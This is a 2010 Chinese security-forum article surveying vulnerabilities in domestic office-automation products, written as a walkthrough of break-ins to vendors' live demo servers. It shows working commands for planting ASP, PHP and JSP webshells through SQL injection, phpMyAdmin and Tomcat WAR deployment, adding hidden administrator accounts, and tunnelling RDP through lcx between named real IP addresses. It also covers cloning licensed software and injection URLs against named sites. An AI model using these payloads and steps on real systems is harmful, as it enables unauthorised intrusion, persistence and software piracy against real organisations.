网络空间安全:行业资讯、技术分享、法规研讨、趋势分析……

忘记密码
“游侠安全网”创建了网络安全从业者QQ大群(群号:1255197) ,欢迎各位同仁加入!有其它问题如合作等,请联系站长“网路游侠”,QQ:55984512


国内OA安全现状初探_Cschii

2010-05-08 21:32 推荐: 浏览: 60 字号:

摘要:   文章作者:Cschii  [关键字]:OA,J2EE,Servlet,Tomcat应用,克隆  [技术要点]: 本文以华天、金和两款OA系统为例,为读者展示安全隐患给OA带来的创伤——不但系统本身被破解,而且殃及到服务器的安全。并对国内使用比较多的OA,如...

  文章作者:Cschii
  [关键字]:OA,J2EE,Servlet,Tomcat应用,克隆
  [技术要点]: 本文以华天、金和两款OA系统为例,为读者展示安全隐患给OA带来的创伤——不但系统本身被破解,而且殃及到服务器的安全。并对国内使用比较多的OA,如通达、华天、金和、泛微、致力协同、新思创等作了检测与分析,几乎都存在安全隐患,这使我们不能不为国内OA系统的安全感到担忧。
  [主要内容]:

  一、突破华天
  1、Tocmcat挂马
  1)Tomcat基础。简单介绍了Tomcat目录结构、web.xml和Server.xml配置文件的主要元素,以及Tomcat调用Servlet的过程;
  2)Tomcat挂马。将jsp木马打包成War文件,然后在Tomcat的管理页面,上传展开(Deploy)该War文件,完成挂马。
  War文件,即网络应用程序文件(Web Archive file),一种与平台无关的文件格式,它允许将许多文件组合成一个存档文件,为 J2EE 应用程序创建的 JAR 文件是 EAR 文件(企业 JAR 文件),而War专用在Web方面。
  3)Tomcat日志。在Tomcat的日志目录logs中以文本方式保存着Tomcat运行的详细信息,这里我们强调两处。一个是Tomcat启动信息,从中我们可以获取Mysql连接用户密码的Base64加密值,再者就是我们上传War以及访问jsp木马的痕迹也被详细记录。这也启示我们在分析Tomcat日志时,应注意“ [Main] Log in”、“Associated with Deployer”等字符。
  2、克隆华天
  远程桌面登陆华天OA的Demo服务器,完成华天OA的“克隆”——完整复制OA安装目录!本地安装后再使用update修改administrator的超级用户密码,就这样,我们获得了一个没有功能和时间限制的华天OA系统!

  二、破解金和
  1、 注入挂马。访http://demos.jh0101.com/ioas选择用户进入系统,找到注入点。
  1)Dos命令Echo写马。我们使用XIAOLU的SQL INJ Commander工具(MSSQL注入的命令行工具,稳定速度快),可执行DOS内外部命令比如dir、net、netstat等,Web目录为“d:\IOAS\ioas”,使用echo写一句话木马。
  Code:
  //echo写一句话木马,使用SQL INJ Commander工具时注意“%”要使用“%25”
  echo ^<%25If Request(“#”)^<^>“” Then Execute(Request(“#”))%25^> >d:\ioas\ioas\book\book_xxx.asp
  2)PhpMyAdmin写马。金和Demos服务器还使用XAMPP(Apache+MySQL+PHP+PERL建站集成软件包)架设了Apache支持Php,使用81端口,安装目录为“d:\xampp”,web目录为“d:\xampp\ htdocs”。这时我们还可以利用phpmyadmin写一句话木马,因为它连接的Mysql权限一般是很高的。我们利用Dos命令type获得Mysql的连接密码(从php站点jhcrm_zm的连接文件config.inc.php或phpmyadmin配置文件的config.inc.php获得)。然后登陆到PhpMyAdmin,选择一个数据库,执行Sql语句写php一句话木马。
  Code:
  //利用MySql语句写php一句话木马
  select ‘‘ into outfile ‘d:\\xampp\\htdocs\\jhqe.php’
  2、内网渗透。利用华天Demo服务器作为跳板连接金和Demos服务器(lcx.exe已上传,3389已开启,并且已添加管理员用户,命令“net user $jhoa jhoa /add”、“net localgroup administrators $jhoa /add”),基本数据如下:
  Code:
  localgroup administrators $jhoa /add“),基本数据如下:
  服务器 IP Lcx.exe存放路径 连接方向 端口
  demo.oa8000.com 211.144.133.246 D:\htoa\tomcat\bin\lcx.exe 本地 5555
  demos.jh0101.com 211.88.14.232 D:\tools\win2003\I386\lcx.exe 远程 3389
  分别执行如下命令:
  Code:
  //在jh0101服务器上利用WebShell执行:把远程端口3389转发到本地44端口
  D:\tools\win2003\I386\lcx.exe -slave 211.144.133.246 44 211.88.14.232 3389
  //在oa8000服务器(本地)上执行:监听44端口并转发到5555端口,如图29
  D:\htoa\tomcat\bin\lcx.exe -listen 44 5555
  当提示”Waiting another Client on port:5555…“,说明远程IP已成功连接到本地44端口,并在5555端口等待连接,这时即可使用远程桌面连接”127.0.0.1:5555“,成功连接到远程金和Demos服务器的3389端口
  注意:lcx运行后不会自动终止,以便我们在本地可以随时连接,但是这样做太明目张胆了,而且一旦使用SQL INJ Commander创建了一个lcx进程后,再次使用该工具时将出错,所以使用后应该及时终止lcx进程。首先我们使用”tasklist /svc“获得lcx进程的PID,然后使用”taskkill /pid 340 /f“强行终止lcx进程。3、注入其他Web服务器,或者利用扫描器、嗅探器等工具进行更深入的渗透。
  4、克隆金和。复制金和GOA目录、备份JHGOA数据库,下载到本地,架设IIS、恢复数据库,完成对金和OA的克隆。注意:金和使用MSSQL内置函数pwdencrypt加密密码。

  三、其他OA

  1、新思创。官方网站www.gotooa.com,演示网址http://5000demo.systron.net.cn,试用用户名及密码:guest。安全问题:几乎未作任何过滤,存在严重注入!!官网下载试用版本,使用DeZender解密Php文件,我们直接分析htmledit\include\upload.php文件,发现没有对文件类型进行限制!而且没有认证用户!看来无需登陆就可以直接上传Php文件,汗。直接请求http://5000demo.systron.net.cn/htmledit/include/upload.php”,另存源码为html文件,修改表单的action并增加提交按钮,上传,查看页面源码获得Php木马地址。

  2、通达。官方网站www.tongda2000.com,演示网址http://oa.tongda2000.com:81,Php语言,存在数字型注入,可以爆出Sql语句和绝对路径,但是magic_quotes_gpc开启。使用%01—%19(除%09、%0a、%0c、%0d)范围的任一个字符绕过空格,构造union语句注出管理员的密码(采用Mysql的crypt函数加密,有能力和兴趣的读者可以尝试破解)。

  3、致力协同。官方网站www.xtoa.cn,在线试用入口http://www.xtoa.cn/usetest.html,使用Jsp语言。为了人性化,协同在OA的登陆页面设计了“电子公告”和“最新动态”,遗憾的是却存在漏洞!问题应该是严重的,因为无需登陆便可注入!
  Code:
  http://219.144.222.100:8080/XTOA/SYSTEMFILES/firstpage/softdown.jsp?typeid=1%20union%20select%201,2,3,4,5%20from%20QJUserInfo

  4、泛微。官方网站www.weaver.com.cn,标准版演示http://www.weaver.com.cn/eoffice/index.html,Php语言,几乎变量都未作任何过滤。

  Web安全一直是动态网站不可摆脱的心痛,在经历了这些年风雨之后,随着大家安全意识的加强,逐步得到了改善,这足以令人欣喜。但是作为信息化的必然产物——OA(Office Automation,办公自动化)系统还仅处于发展的初级阶段,其概念、标准、规范还不够统一和完善,当大家都疲于完善改进功能设计时,就很难顾及系统的安全性能,就像初学代码编写,首先考虑是功能,然后才是性能。对于OA,目前尚没有比较权威的测评标准与结果,大家仁者见仁,智者见智。作为事物的发展初期,这是在所难免的,像CMS系统发展至今,也很难评价出谁优谁劣。但是国内OA安全现状必须引起我们的高度重视,OA系统的使用者和研发者!只有这样才能构筑起一道更安全的网络防线。

联系站长租广告位!

中国首席信息安全官